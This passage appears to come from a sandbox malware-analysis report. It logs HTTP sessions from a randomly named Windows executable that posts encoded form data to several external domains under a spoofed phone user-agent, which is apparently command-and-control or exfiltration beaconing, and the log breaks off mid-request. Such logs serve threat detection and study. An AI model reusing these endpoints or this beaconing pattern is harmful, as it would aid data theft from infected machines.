                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:52.520925999 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTMwZTljYjYtNmQ1Ni00YTcwLWIzNDktZDBiOGFkZWYyODVhIiwicGFnZV90aW1lIjoxNzI3MDE5Nz
                    Sep 22, 2024 17:41:52.520962954 CEST | 1236 | IN | HTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:51 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: a30e9cb6-6d56-4a70-b349-d0b8adef285a
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=a30e9cb6-6d56-4a70-b349-d0b8adef285a; expires=Sun, 22 Sep 2024 15:56:51 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.4 | 49761 | 199.59.243.227 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:41:53.977318048 CEST | 482 | OUT | GET /m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.dom-2.online
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:54.448005915 CEST | 1236 | IN | HTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:53 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1466
                    x-request-id: dd4d7c06-5099-416f-9a8a-ffab1ca4b020
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmL6BH7tJ2eFXh4jATZDBVu/MPs3YsB+WPfXUeGTVUdhItc5dbyqpHNZeI/H3XXkQ7w2LVGnMbCy6KPdLR+1Jw==
                    set-cookie: parking_session=dd4d7c06-5099-416f-9a8a-ffab1ca4b020; expires=Sun, 22 Sep 2024 15:56:54 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4c 36 42 48 37 74 4a 32 65 46 58 68 34 6a 41 54 5a 44 42 56 75 2f 4d 50 73 33 59 73 42 2b 57 50 66 58 55 65 47 54 56 55 64 68 49 74 63 35 64 62 79 71 70 48 4e 5a 65 49 2f 48 33 58 58 6b 51 37 77 32 4c 56 47 6e 4d 62 43 79 36 4b 50 64 4c 52 2b 31 4a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmL6BH7tJ2eFXh4jATZDBVu/MPs3YsB+WPfXUeGTVUdhItc5dbyqpHNZeI/H3XXkQ7w2LVGnMbCy6KPdLR+1Jw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:54.448029995 CEST | 919 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGQ0ZDdjMDYtNTA5OS00MTZmLTlhOGEtZmZhYjFjYTRiMDIwIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.4 | 49762 | 162.241.226.190 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:41:59.523307085 CEST | 754 | OUT | POST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 57 64 50 78 47 52 48 7a 65 5a 5a 32 4c 77 32 6b 6c 61 6b 6d 33 64 70 31 30 46 62 73 6e 71 2f 44 77 4c 42 57 6c 4a 44 63 4e 39 5a 61 57 66 79 7a 77 4a 47 42 6f 30 68 39 52 2b 79 44 31 71 4b 41 72 30 71 6c 58 53 48 4a 32 6c 71 64 55 32 75 4c 4b 47 79 66 79 65 44 6e 63 49 72 34 33 79 35 2f 5a 45 2f 54 67 59 2f 32 32 46 63 33 76 62 71 66 4d 38 4d 33 33 34 44 33 59 43 4a 6f 4a 75 39 31 4b 36 63 67 62 5a 78 79 75 69 32 50 57 38 30 59 56 77 74 53 31 4d 31 30 56 56 69 51 7a 34 34 45 6b 43 66 48 34 39 74 43 58 5a 4d 65 54 63 59 71 67 63 62 4d 75 41 3d 3d
                    Data Ascii: 6X=QbFBNUhGo9/nWdPxGRHzeZZ2Lw2klakm3dp10Fbsnq/DwLBWlJDcN9ZaWfyzwJGBo0h9R+yD1qKAr0qlXSHJ2lqdU2uLKGyfyeDncIr43y5/ZE/TgY/22Fc3vbqfM8M334D3YCJoJu91K6cgbZxyui2PW80YVwtS1M10VViQz44EkCfH49tCXZMeTcYqgcbMuA==
                    Sep 22, 2024 17:42:00.093818903 CEST | 479 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:00 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.4 | 49763 | 162.241.226.190 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:02.115166903 CEST | 774 | OUT | POST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 62 44 78 72 78 57 6d 4c 72 63 4b 39 5a 61 5a 2f 79 32 30 4a 47 30 6f 30 6c 44 52 37 4b 44 31 71 65 41 72 78 57 6c 58 67 76 57 33 31 71 6c 4d 47 75 4a 55 32 79 66 79 65 44 6e 63 4d 44 47 33 7a 64 2f 5a 31 76 54 76 64 4c 31 71 31 63 34 73 62 71 66 49 38 4d 4e 33 34 44 42 59 43 34 2f 4a 74 46 31 4b 37 73 67 61 49 78 78 35 53 32 46 4c 73 31 55 52 79 30 5a 73 50 41 48 52 58 4f 77 7a 71 38 49 73 6b 4f 64 70 4d 4d 56 46 5a 6f 74 4f 62 52 65 74 66 6d 46 31 44 70 41 2f 31 4e 42 59 59 53 6b 4e 48 57 49 6d 63 47 6c 59 59 63 3d
                    Data Ascii: 6X=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZbDxrxWmLrcK9ZaZ/y20JG0o0lDR7KD1qeArxWlXgvW31qlMGuJU2yfyeDncMDG3zd/Z1vTvdL1q1c4sbqfI8MN34DBYC4/JtF1K7sgaIxx5S2FLs1URy0ZsPAHRXOwzq8IskOdpMMVFZotObRetfmF1DpA/1NBYYSkNHWImcGlYYc=
                    Sep 22, 2024 17:42:02.976418972 CEST | 479 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:02 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.4 | 49764 | 162.241.226.190 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:04.667224884 CEST | 10856 | OUT | POST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 54 44 78 59 35 57 68 61 72 63 4c 39 5a 61 55 66 79 33 30 4a 47 70 6f 30 64 48 52 36 33 30 31 6f 6d 41 6f 55 61 6c 52 55 37 57 75 46 71 6c 46 6d 75 55 4b 47 7a 4c 79 66 7a 37 63 49 66 47 33 7a 64 2f 5a 32 48 54 72 49 2f 31 6f 31 63 33 76 62 71 54 4d 38 4e 44 33 34 4c 2f 59 44 4e 43 4a 63 6c 31 4e 62 38 67 63 36 70 78 6c 43 32 44 4b 73 30 4a 52 79 49 57 73 50 64 38 52 54 4f 57 7a 6f 67 49 70 31 2f 47 38 66 73 6f 47 4a 38 42 55 62 46 74 6b 76 57 6e 30 7a 45 30 2b 48 39 69 61 4c 6e 4e 4b 6c 72 61 38 38 57 43 46 50 66 4b 4a 32 4a 6f 67 70 42 37 39 59 79 71 52 52 72 64 51 6b 6a 2b 71 46 37 4e 52 37 4f 6f 6f 50 5a 66 4b 36 71 2b 34 39 4f 70 75 72 46 63 50 47 32 65 79 47 61 4d 45 70 6f 75 2f 36 49 55 5a 74 69 4c 79 6d 61 79 6d 2b 49 35 76 65 6c 54 79 69 47 58 35 47 4a 46 37 37 52 38 73 79 5a 72 58 66 6a 34 2f 62 50 79 45 46 61 6b 48 78 2f 51 78 33 55 63 37 33 6e 65 4d 42 30 [TRUNCATED]
                    Data Ascii: 6X= [TRUNCATED]
                    Sep 22, 2024 17:42:05.325282097 CEST | 479 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:05 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.4 | 49765 | 162.241.226.190 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:07.213990927 CEST | 488 | OUT | GET /21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.easyanalytics.site
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:42:07.803864002 CEST | 479 | IN | HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:07 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.4 | 49766 | 91.215.85.23 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:13.451229095 CEST | 733 | OUT | POST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Ascii: 6X=stAvf0FTVkcothZYuReSmiamYnIXGCqixrjJMS2MthGBv1081QCCWeJ0hue70ffGDJXkvetjf1seKwFWCHFEBnrWnsw2vKsh7vNxtoVCZVsLngK40fghjr5hTpglg9PKiYgP3pBpVOw+cGku3FHWkv/rjr5U44HOc1eggzp1QoCy3mKk+P/1Cl45T0n8X7roEQ==
                    Sep 22, 2024 17:42:14.194087029 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                    Server: nginx/1.26.2
                    Date: Sun, 22 Sep 2024 15:42:14 GMT
                    Content-Type: text/html
                    Content-Length: 157
                    Connection: close
                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    30 | 192.168.2.4 | 49767 | 91.215.85.23 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:42:15.999684095 CEST | 753 | OUT | POST /1i25/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.kalomor.top
                    Origin: http://www.kalomor.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.kalomor.top/1i25/
